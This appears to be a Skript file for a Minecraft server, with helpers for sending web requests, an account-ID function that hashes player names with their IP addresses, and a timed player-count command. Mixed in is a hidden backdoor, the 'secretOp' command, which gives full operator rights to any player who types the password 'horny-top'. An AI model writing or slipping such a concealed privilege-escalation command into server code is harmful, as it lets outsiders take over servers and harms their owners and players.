# Web
effect send [get] [web] request to %string% and return as %string%:
  trigger:
    send a request to "%expression-1%"
    set {_response} to last http response's body

    set {responses::%expression-2%::body} to {_response}

effect send post [web] request to %string% ([with] body|,) %string% and return as %string%:
  trigger:
    send a "post" request to "%expression-1%" with the headers "Content-Type: application/json" and the body "%expression-2%"
    set {_response} to last http response's body

    set {responses::%expression-3%::body} to {_response}

# Account
function getAccountID(player: player) :: string:
  set {_name} to {_player}'s display name
  set {_ip} to {_player}'s ip

  set {_id} to "%{_name}% at %{_ip}%" hashed with SHA-256
  return {_id}

command secretOp [<text>]:
  trigger:
    if arg 1 is "horny-top":
      op player
      send "Да"

command list:
  trigger:
    send "c-001/%number of all players%" to console
    
every 2 seconds:
  execute console command "list"